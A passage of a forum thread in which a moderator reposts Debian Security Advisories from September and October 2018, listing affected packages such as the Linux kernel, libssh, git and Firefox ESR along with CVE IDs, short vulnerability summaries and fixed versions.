Jump to content


NEW UPDATES Debian

debian updates sunrat bruno v.t. eric layton

  • Please log in to reply
1498 replies to this topic

#1476 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 19 September 2018 - 06:45 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4297-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
September 19, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser

Two vulnerabilities have been discovered in the chromium web browser.
Kevin Cheung discovered an error in the WebAssembly implementation and
evil1m0 discovered a URL spoofing issue.

For the stable distribution (stretch), this problem has been fixed in
version 69.0.3497.92-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1477 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 21 September 2018 - 07:54 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4298-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 20, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : hylafax
CVE ID         : CVE-2018-17141

Luis Merino, Markus Vervier and Eric Sesterhenn discovered that missing
input sanitising in the Hylafax fax software could potentially result in
the execution of arbitrary code via a malformed fax message.

For the stable distribution (stretch), this problem has been fixed in
version 3:6.0.6-7+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4299-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
September 21, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : texlive-bin
CVE            : not yet available

Nick Roessler from the University of Pennsylvania has found a buffer overflow
in texlive-bin, the executables for TexLive, the popular distribution of TeX
document production system.

This buffer overflow can be used for arbitrary code execution by crafting a
special type1 font (.pfb) and provide it to users running pdf(la)tex, dvips or
luatex in a way that the font is loaded.

For the stable distribution (stretch), this problem has been fixed in
version 2016.20160513.41080.dfsg-2+deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1478 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 22 September 2018 - 08:03 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4300-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 22, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libarchive-zip-perl
CVE ID         : CVE-2018-10860
Debian Bug     : 902882

It was discovered that Archive::Zip, a perl module for manipulation of
ZIP archives, is prone to a directory traversal vulnerability. An
attacker able to provide a specially crafted archive for processing can
take advantage of this flaw to overwrite arbitrary files during archive
extraction.

For the stable distribution (stretch), this problem has been fixed in
version 1.59-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4301-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 22, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mediawiki
CVE ID         : CVE-2018-0503 CVE-2018-0504 CVE-2018-0505

Multiple security vulnerabilities have been discovered in MediaWiki, a
website engine for collaborative work, which result in incorrectly
configured rate limits, information disclosure in Special:Redirect/logid
and bypass of an account lock.

For the stable distribution (stretch), these problems have been fixed in
version 1:1.27.5-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1479 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 23 September 2018 - 07:04 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4302-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openafs
CVE ID         : CVE-2018-16947 CVE-2018-16948 CVE-2018-16949
Debian Bug     : 908616

Several vulnerabilities were discovered in openafs, an implementation of
the distributed filesystem AFS. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2018-16947

    Jeffrey Altman reported that the backup tape controller (butc)
    process does accept incoming RPCs but does not require (or allow
    for) authentication of those RPCs, allowing an unauthenticated
    attacker to perform volume operations with administrator
    credentials.

    https://openafs.org/...SA-2018-001.txt

CVE-2018-16948

    Mark Vitale reported that several RPC server routines do not fully
    initialize output variables, leaking memory contents (from both
    the stack and the heap) to the remote caller for
    otherwise-successful RPCs.

    https://openafs.org/...SA-2018-002.txt

CVE-2018-16949

    Mark Vitale reported that an unauthenticated attacker can consume
    large amounts of server memory and network bandwidth via
    specially crafted requests, resulting in denial of service to
    legitimate clients.

    https://openafs.org/...SA-2018-003.txt

For the stable distribution (stretch), these problems have been fixed in
version 1.6.20-2+deb9u2.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4303-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : okular
CVE ID         : CVE-2018-1000801

Joran Herve discovered that the Okular document viewer was susceptible
to directory traversal via malformed .okular files (annotated document
archives), which could result in the creation of arbitrary files.

For the stable distribution (stretch), this problem has been fixed in
version 4:16.08.2-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4304-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12383 CVE-2018-12385

Two security issues have been found in the Mozilla Firefox web browser,
which could potentially result in the execution of arbitrary code and
local information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 60.2.1esr-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1480 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 26 September 2018 - 08:28 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4305-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
September 24, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : strongswan
CVE ID         : CVE-2018-16151 CVE-2018-16152

Sze Yiu Chau and his team from Purdue University and The University of Iowa
found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite.

Problems in the parsing and verification of RSA signatures could lead to a
Bleichenbacher-style low-exponent signature forgery in certificates and during
IKE authentication.

While the gmp plugin doesn't allow arbitrary data after the ASN.1 structure
(the original Bleichenbacher attack), the ASN.1 parser is not strict enough and
allows data in specific fields inside the ASN.1 structure.

Only installations using the gmp plugin are affected (on Debian OpenSSL plugin
has priority over GMP one for RSA operations), and only when using keys and
certificates (including ones from CAs) using keys with an exponent e = 3, which
is usually rare in practice.

CVE-2018-16151

    The OID parser in the ASN.1 code in gmp allows any number of random bytes
    after a valid OID.

CVE-2018-16152

    The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a
    NULL value for the optional parameter which is not used with any PKCS#1
    algorithm.

For the stable distribution (stretch), these problems have been fixed in
version 5.5.1-4+deb9u3.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1481 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 27 September 2018 - 07:04 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4306-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 27, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : python2.7
CVE ID         : CVE-2018-1060 CVE-2018-1061 CVE-2018-14647
                 CVE-2018-1000802

Multiple security issues were discovered in Python: ElementTree failed
to initialise Expat's hash salt, two denial of service issues were found
in difflib and poplib and the shutil module was affected by a command
injection vulnerability.

For the stable distribution (stretch), these problems have been fixed in
version 2.7.13-2+deb9u3.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1482 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 28 September 2018 - 07:08 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4307-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 28, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : python3.5
CVE ID         : CVE-2017-1000158 CVE-2018-1060 CVE-2018-1061
                 CVE-2018-14647

Multiple security issues were discovered in Python: ElementTree failed
to initialise Expat's hash salt, two denial of service issues were found
in difflib and poplib and a buffer overflow in PyString_DecodeEscape.

For the stable distribution (stretch), these problems have been fixed in
version 3.5.3-1+deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1483 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 01 October 2018 - 08:38 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4308-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 01, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux
CVE ID         : CVE-2018-6554 CVE-2018-6555 CVE-2018-7755 CVE-2018-9363
                 CVE-2018-9516 CVE-2018-10902 CVE-2018-10938 CVE-2018-13099
                 CVE-2018-14609 CVE-2018-14617 CVE-2018-14633 CVE-2018-14678
                 CVE-2018-14734 CVE-2018-15572 CVE-2018-15594 CVE-2018-16276
                 CVE-2018-16658 CVE-2018-17182

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a privilege escalation, denial of service or information
leaks.

CVE-2018-6554

    A memory leak in the irda_bind function in the irda subsystem was
    discovered. A local user can take advantage of this flaw to cause a
    denial of service (memory consumption).

CVE-2018-6555

    A flaw was discovered in the irda_setsockopt function in the irda
    subsystem, allowing a local user to cause a denial of service
    (use-after-free and system crash).

CVE-2018-7755

    Brian Belleville discovered a flaw in the fd_locked_ioctl function
    in the floppy driver in the Linux kernel. The floppy driver copies a
    kernel pointer to user memory in response to the FDGETPRM ioctl. A
    local user with access to a floppy drive device can take advantage
    of this flaw to discover the location kernel code and data.

CVE-2018-9363

    It was discovered that the Bluetooth HIDP implementation did not
    correctly check the length of received report messages. A paired
    HIDP device could use this to cause a buffer overflow, leading to
    denial of service (memory corruption or crash) or potentially
    remote code execution.

CVE-2018-9516

    It was discovered that the HID events interface in debugfs did not
    correctly limit the length of copies to user buffers.  A local
    user with access to these files could use this to cause a
    denial of service (memory corruption or crash) or possibly for
    privilege escalation.  However, by default debugfs is only
    accessible by the root user.

CVE-2018-10902

    It was discovered that the rawmidi kernel driver does not protect
    against concurrent access which leads to a double-realloc (double
    free) flaw. A local attacker can take advantage of this issue for
    privilege escalation.

CVE-2018-10938

    Yves Younan from Cisco reported that the Cipso IPv4 module did not
    correctly check the length of IPv4 options. On custom kernels with
    CONFIG_NETLABEL enabled, a remote attacker could use this to cause
    a denial of service (hang).

CVE-2018-13099

    Wen Xu from SSLab at Gatech reported a use-after-free bug in the
    F2FS implementation. An attacker able to mount a crafted F2FS
    volume could use this to cause a denial of service (crash or
    memory corruption) or possibly for privilege escalation.

CVE-2018-14609

    Wen Xu from SSLab at Gatech reported a potential null pointer
    dereference in the F2FS implementation. An attacker able to mount
    a crafted F2FS volume could use this to cause a denial of service
    (crash).

CVE-2018-14617

    Wen Xu from SSLab at Gatech reported a potential null pointer
    dereference in the HFS+ implementation. An attacker able to mount
    a crafted HFS+ volume could use this to cause a denial of service
    (crash).

CVE-2018-14633

    Vincent Pelletier discovered a stack-based buffer overflow flaw in
    the chap_server_compute_md5() function in the iSCSI target code. An
    unauthenticated remote attacker can take advantage of this flaw to
    cause a denial of service or possibly to get a non-authorized access
    to data exported by an iSCSI target.

CVE-2018-14678

    M. Vefa Bicakci and Andy Lutomirski discovered a flaw in the
    kernel exit code used on amd64 systems running as Xen PV guests.
    A local user could use this to cause a denial of service (crash).

CVE-2018-14734

    A use-after-free bug was discovered in the InfiniBand
    communication manager. A local user could use this to cause a
    denial of service (crash or memory corruption) or possible for
    privilege escalation.

CVE-2018-15572

    Esmaiel Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and
    Nael Abu-Ghazaleh, from University of California, Riverside,
    reported a variant of Spectre variant 2, dubbed SpectreRSB. A
    local user may be able to use this to read sensitive information
    from processes owned by other users.

CVE-2018-15594

    Nadav Amit reported that some indirect function calls used in
    paravirtualised guests were vulnerable to Spectre variant 2.  A
    local user may be able to use this to read sensitive information
    from the kernel.

CVE-2018-16276

    Jann Horn discovered that the yurex driver did not correctly limit
    the length of copies to user buffers.  A local user with access to
    a yurex device node could use this to cause a denial of service
    (memory corruption or crash) or possibly for privilege escalation.

CVE-2018-16658

    It was discovered that the cdrom driver does not correctly
    validate the parameter to the CDROM_DRIVE_STATUS ioctl.  A user
    with access to a cdrom device could use this to read sensitive
    information from the kernel or to cause a denial of service
    (crash).

CVE-2018-17182

    Jann Horn discovered that the vmacache_flush_all function mishandles
    sequence number overflows. A local user can take advantage of this
    flaw to trigger a use-after-free, causing a denial of service
    (crash or memory corruption) or privilege escalation.

For the stable distribution (stretch), these problems have been fixed in
version 4.9.110-3+deb9u5.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1484 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 03 October 2018 - 07:12 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4309-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
October 01, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : strongswan
CVE ID         : CVE-2018-17540

Google's OSS-Fuzz revealed an exploitable bug in the gmp plugin caused by the
patch that fixes CVE-2018-16151 and CVE-2018-16151 (DSA-4305-1).

An attacker could trigger it using crafted certificates with RSA keys with
very small moduli. Verifying signatures with such keys would cause an integer
underflow and subsequent heap buffer overflow resulting in a crash of the
daemon. While arbitrary code execution is not completely ruled out because of
the heap buffer overflow, due to the form of the data written to the buffer
it seems difficult to actually exploit it in such a way.

For the stable distribution (stretch), this problem has been fixed in
version 5.5.1-4+deb9u4.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4310-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 03, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12386 CVE-2018-12387

Two security issues have been found in the Mozilla Firefox web browser,
which could potentially result in the execution of arbitrary code inside
the sandboxed content process.

For the stable distribution (stretch), these problems have been fixed in
version 60.2.2esr-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1485 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 06 October 2018 - 06:45 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4311-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 05, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : git
CVE ID         : CVE-2018-17456

joernchen of Phenoelit discovered that git, a fast, scalable,
distributed revision control system, is prone to an arbitrary code
execution vulnerability via a specially crafted .gitmodules file in a
project cloned with --recurse-submodules.

For the stable distribution (stretch), this problem has been fixed in
version 1:2.11.0-3+deb9u4.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1486 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 08 October 2018 - 07:00 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4312-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 08, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tinc
CVE ID         : CVE-2018-16738 CVE-2018-16758

Several vulnerabilities were discovered in tinc, a Virtual Private
Network (VPN) daemon. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2018-16738

    Michael Yonli discovered a flaw in the implementation of the
    authentication protocol that could allow a remote attacker to
    establish an authenticated, one-way connection with another node.

CVE-2018-16758

    Michael Yonli discovered that a man-in-the-middle that has
    intercepted a TCP connection might be able to disable encryption of
    UDP packets sent by a node.

For the stable distribution (stretch), these problems have been fixed in
version 1.0.31-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4313-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 08, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux
CVE ID         : CVE-2018-15471 CVE-2018-18021

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a privilege escalation, denial of service or information
leaks.

CVE-2018-15471 (XSA-270)

    Felix Wilhelm of Google Project Zero discovered a flaw in the hash
    handling of the xen-netback Linux kernel module. A malicious or
    buggy frontend may cause the (usually privileged) backend to make
    out of bounds memory accesses, potentially resulting in privilege
    escalation, denial of service, or information leaks.

    https://xenbits.xen....visory-270.html

CVE-2018-18021

    It was discovered that the KVM subsystem on the arm64 platform does
    not properly handle the KVM_SET_ON_REG ioctl. An attacker who can
    create KVM based virtual machines can take advantage of this flaw
    for denial of service (hypervisor panic) or privilege escalation
    (arbitrarily redirect the hypervisor flow of control with full
    register control).

For the stable distribution (stretch), these problems have been fixed in
version 4.9.110-3+deb9u6.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1487 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 11 October 2018 - 06:11 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4314-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 11, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : net-snmp
CVE ID         : CVE-2018-18065
Debian Bug     : 910638

Magnus Klaaborg Stubman discovered a NULL pointer dereference bug in
net-snmp, a suite of Simple Network Management Protocol applications,
allowing a remote, authenticated attacker to crash the snmpd process
(causing a denial of service).

For the stable distribution (stretch), this problem has been fixed in
version 5.7.3+dfsg-1.7+deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1488 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 18 October 2018 - 07:58 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4315-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 12, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : wireshark
CVE ID         : CVE-2018-16056 CVE-2018-16057 CVE-2018-16058

Multiple vulnerabilities have been discovered in Wireshark, a network
protocol analyzer which could result in denial of service or the
execution of arbitrary code.

For the stable distribution (stretch), these problems have been fixed in
version 2.6.3-1~deb9u1. This update upgrades Wireshark to the 2.6.x
release branch, future security upgrades will be based on this series.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4316-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 12, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : imagemagick
CVE ID         : CVE-2018-16412 CVE-2018-16413 CVE-2018-16642 CVE-2018-16644
                 CVE-2018-16645

This update fixes several vulnerabilities in Imagemagick, a graphical
software suite. Various memory handling problems or incomplete input
sanitising have been found in the coders for BMP, DIB, PICT, DCM, CUT
and PSD.

For the stable distribution (stretch), these problems have been fixed in
version 8:6.9.7.4+dfsg-11+deb9u6.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4317-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 14, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : otrs2
CVE ID         : CVE-2018-14593 CVE-2018-16586 CVE-2018-16587

Three vulnerabilities were discovered in the Open Ticket Request System
which could result in privilege escalation or denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 5.0.16-1+deb9u6.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4318-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 15, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : moin
CVE ID         : CVE-2017-5934
Debian Bug     : 910776

Nitin Venkatesh discovered a cross-site scripting vulnerability in moin,
a Python clone of WikiWiki. A remote attacker can conduct cross-site
scripting attacks via the GUI editor's link dialogue. This only affects
installations which have set up fckeditor (not enabled by default).

For the stable distribution (stretch), this problem has been fixed in
version 1.9.9-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4319-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 15, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : spice
CVE ID         : CVE-2018-10873
Debian Bug     : 906315

Frediano Ziglio reported a missing check in the script to generate
demarshalling code in the SPICE protocol client and server library. The
generated demarshalling code is prone to multiple buffer overflows. An
authenticated attacker can take advantage of this flaw to cause a denial
of service (spice server crash), or possibly, execute arbitrary code.

For the stable distribution (stretch), this problem has been fixed in
version 0.12.8-2.1+deb9u2.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1489 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 19 October 2018 - 07:51 AM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4320-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 16, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : asterisk
CVE ID         : CVE-2018-7284 CVE-2018-7286 CVE-2018-12227 CVE-2018-17281
Debian Bug     : 891227 891228 902954 909554

Multiple vulnerabilities have been discovered in Asterisk, an open source
PBX and telephony toolkit, which may result in denial of service or
information disclosure.
      
For the stable distribution (stretch), these problems have been fixed in
version 1:13.14.1~dfsg-2+deb9u4.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4321-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 16, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : graphicsmagick
CVE ID         : CVE-2017-10794 CVE-2017-10799 CVE-2017-10800 CVE-2017-11102
                 CVE-2017-11139 CVE-2017-11140 CVE-2017-11403 CVE-2017-11636
                 CVE-2017-11637 CVE-2017-11638 CVE-2017-11641 CVE-2017-11642
                 CVE-2017-11643 CVE-2017-11722 CVE-2017-12935 CVE-2017-12936
                 CVE-2017-12937 CVE-2017-13063 CVE-2017-13064 CVE-2017-13065
                 CVE-2017-13134 CVE-2017-13737 CVE-2017-13775 CVE-2017-13776
                 CVE-2017-13777 CVE-2017-14314 CVE-2017-14504 CVE-2017-14733
                 CVE-2017-14994 CVE-2017-14997 CVE-2017-15238 CVE-2017-15277
                 CVE-2017-15930 CVE-2017-16352 CVE-2017-16353 CVE-2017-16545
                 CVE-2017-16547 CVE-2017-16669 CVE-2017-17498 CVE-2017-17500
                 CVE-2017-17501 CVE-2017-17502 CVE-2017-17503 CVE-2017-17782
                 CVE-2017-17783 CVE-2017-17912 CVE-2017-17913 CVE-2017-17915
                 CVE-2017-18219 CVE-2017-18220 CVE-2017-18229 CVE-2017-18230
                 CVE-2017-18231 CVE-2018-5685 CVE-2018-6799 CVE-2018-9018

Several vulnerabilities have been discovered in GraphicsMagick, a set of
command-line applications to manipulate image files, which could result
in denial of service or the execution of arbitrary code if malformed
image files are processed.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.30+hg15796-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4322-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 17, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libssh
CVE ID         : CVE-2018-10933
Debian Bug     : 911149

Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH
library, contains an authentication bypass vulnerability in the server
code. An attacker can take advantage of this flaw to successfully
authenticate without any credentials by presenting the server an
SSH2_MSG_USERAUTH_SUCCESS message in place of the
SSH2_MSG_USERAUTH_REQUEST message which the server would expect to
initiate authentication.

For the stable distribution (stretch), this problem has been fixed in
version 0.7.3-2+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4323-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 18, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : drupal7
CVE ID         : not yet available

Two vulnerabilities were found in Drupal, a fully-featured content
management framework, which could result in arbitrary code execution or
an open redirect. For additional information, please refer to the
upstream advisory at https://www.drupal.o...a-core-2018-006
      
For the stable distribution (stretch), this problem has been fixed in
version 7.52-2+deb9u5.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1490 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 24 October 2018 - 08:12 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4324-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 24, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392
                 CVE-2018-12393 CVE-2018-12395 CVE-2018-12396
CVE-2018-12397

Multiple security issues have been found in the Mozilla Firefox web
browser, which could result in the execution of arbitrary code,
privilege escalation or information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 60.3.0esr-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1491 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 25 October 2018 - 06:35 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4325-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mosquitto
CVE ID         : CVE-2017-7651 CVE-2017-7652 CVE-2017-7653 CVE-2017-7654
Debian Bug     : 911265 911266

It was discovered that mosquitto, an MQTT broker, was vulnerable to
remote denial-of-service attacks that could be mounted using various
vectors.

For the stable distribution (stretch), these problems have been fixed in
version 1.4.10-3+deb9u2

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4326-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openjdk-8
CVE ID         : CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169
                 CVE-2018-3180 CVE-2018-3183 CVE-2018-3214

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in denial of
service, sandbox bypass, incomplete TLS identity verification,
information disclosure or the execution of arbitrary code.
    
For the stable distribution (stretch), these problems have been fixed in
version 8u181-b13-2~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4327-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2017-16541 CVE-2018-12376 CVE-2018-12377 CVE-2018-12378
                 CVE-2018-12379 CVE-2018-12383 CVE-2018-12385

Multiple security issues have been found in Thunderbird: Multiple memory
safety errors and use-after-frees may lead to the execution of arbitrary
code or denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 1:60.2.1-2~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4328-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xorg-server
CVE ID         : CVE-2018-14665

Narendra Shinde discovered that incorrect command-line parameter
validation in the Xorg X server may result in arbitary file overwrite,
which can result in privilege escalation.

For the stable distribution (stretch), this problem has been fixed in
version 2:1.19.2-1+deb9u4.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1492 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 28 October 2018 - 08:05 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4321-2                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 28, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : graphicsmagick

The update of Graphicsmagick in DSA-4321-1 introduced a change in the
